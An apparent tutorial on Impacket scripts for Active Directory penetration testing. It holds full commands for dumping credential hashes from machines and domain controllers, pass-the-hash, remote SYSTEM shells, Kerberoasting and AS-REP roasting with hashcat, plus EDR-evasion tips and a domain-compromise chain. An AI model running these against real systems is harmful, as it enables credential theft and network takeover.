Impacket is a collection of Python classes for working with network protocols, and it has become one of the most essential toolkits for Active Directory penetration testing. Developed by Fortra (formerly SecureAuth), it provides low-level access to SMB, Kerberos, LDAP, and other Windows protocols. This guide covers the most commonly used scripts during AD engagements with real command examples.
Installation
Via pip (recommended for latest version)
pip3 install impacket
From source (for development or the absolute latest commits)
git clone https://github.com/fortra/impacket.git
cd impacket
pip3 install -r requirements.txt
pip3 install .
On Kali Linux
Impacket scripts are pre-installed. Access them directly by name:
secretsdump.py --help
psexec.py --help
If not found, they’re typically in /usr/share/doc/python3-impacket/examples/ or installed system-wide after pip3 install impacket.
Authentication Options
Most Impacket scripts share a common authentication syntax:
DOMAIN/username:password@target
With a password hash (pass-the-hash):
DOMAIN/username@target -hashes LMHash:NTHash
With Kerberos (after obtaining a ticket):
-k -no-pass
secretsdump.py is the star of the toolkit. It can dump credentials from SAM, LSA secrets, NTDS.dit, and DPAPI blobs.
Remote Dump via SMB
With local admin credentials on a Windows machine:
secretsdump.py DOMAIN/Administrator:Password123@192.168.1.10
With a password hash (pass-the-hash):
secretsdump.py -hashes :aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c \
DOMAIN/Administrator@192.168.1.10
Dumping NTDS.dit from a Domain Controller
This dumps all domain hashes — the crown jewels of an AD engagement:
secretsdump.py DOMAIN/Administrator:Password123@dc01.domain.local -just-dc-ntlm
The -just-dc-ntlm flag skips Kerberos history and DPAPI secrets, giving you only the NT hashes you need for pass-the-hash or cracking.
Offline NTDS.dit Analysis
If you’ve already copied NTDS.dit and SYSTEM from a DC:
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
psexec.py — Remote Command Execution
psexec.py implements the PsExec technique: it uploads a service binary over SMB and executes it, giving you a SYSTEM shell.
psexec.py DOMAIN/Administrator:Password123@192.168.1.10
With a hash:
psexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c \
DOMAIN/Administrator@192.168.1.10
You’ll land in a SYSTEM shell:
Microsoft Windows [Version 10.0.19041.1415]
C:\Windows\system32>whoami
nt authority\system
Note: psexec.py is noisy. It creates a service and drops a binary to disk, which is flagged by most EDR products. Use wmiexec.py or smbexec.py for stealthier execution.
wmiexec.py — Stealthier Remote Execution
wmiexec.py uses WMI to execute commands, running them in-memory without dropping a binary to disk (mostly):
wmiexec.py DOMAIN/Administrator:Password123@192.168.1.10
You get a semi-interactive shell. Run specific commands:
wmiexec.py DOMAIN/Administrator:Password123@192.168.1.10 "whoami"
wmiexec.py DOMAIN/Administrator:Password123@192.168.1.10 "net localgroup administrators"
smbclient.py — SMB Share Enumeration
Browse and interact with SMB shares:
smbclient.py DOMAIN/user:Password123@192.168.1.10
Within the interactive shell:
# shares — list available shares
# use C$ — connect to C$ share
# ls — list files
# get filename — download a file
# put filename — upload a file
List shares without an interactive session:
smbclient.py DOMAIN/user:Password123@192.168.1.10 -no-pass
GetUserSPNs.py — Kerberoasting
Kerberoasting extracts Kerberos service tickets for accounts with Service Principal Names (SPNs), then cracks them offline. Any domain user can request these tickets.
Step 1: Find Kerberoastable Accounts
GetUserSPNs.py DOMAIN/user:Password123 -dc-ip 192.168.1.1
Output shows accounts and their SPNs:
ServicePrincipalName Name MemberOf
------------------------------------ --------- --------
HTTP/webserver.domain.local:80 websvc Domain Users
MSSQLSvc/sql01.domain.local:1433 sqlservice Domain Users
GetUserSPNs.py DOMAIN/user:Password123 -dc-ip 192.168.1.1 -request -outputfile kerberoast_hashes.txt
Step 3: Crack Offline with Hashcat
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
Mode 13100 is for Kerberos 5 TGS-REP etype 23 (RC4). If you capture etype 18 (AES256), use mode 19700.
GetNPUsers.py — AS-REP Roasting
AS-REP roasting targets accounts with “Do not require Kerberos preauthentication” set. No credentials needed:
GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip 192.168.1.1 -no-pass -format hashcat
Crack the resulting hash:
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
lookupsid.py — User Enumeration Without Auth
Enumerate domain users via SID brute-forcing (works with null sessions or guest access):
lookupsid.py DOMAIN/guest:@192.168.1.10
samrdump.py — User and Group Enumeration
Dump users and groups via the SAMR protocol:
samrdump.py DOMAIN/user:Password123@192.168.1.10
Practical Attack Chain Example
A typical Impacket-assisted AD compromise chain:
- Get initial access (phishing, exposed service, weak creds)
- Enumerate SPNs:
GetUserSPNs.py → crack hashes → escalate to service account
- Lateral movement:
wmiexec.py to other machines with cracked credentials
- Reach a DC:
secretsdump.py -just-dc-ntlm to dump all domain hashes
- Create persistence: pass-the-hash with domain admin NT hash
Impacket scripts are staples on OSCP, CRTO, and real-world engagements. Understanding what each script does at the protocol level makes you a better defender as much as a better attacker — knowing how Kerberoasting works is the first step to detecting it.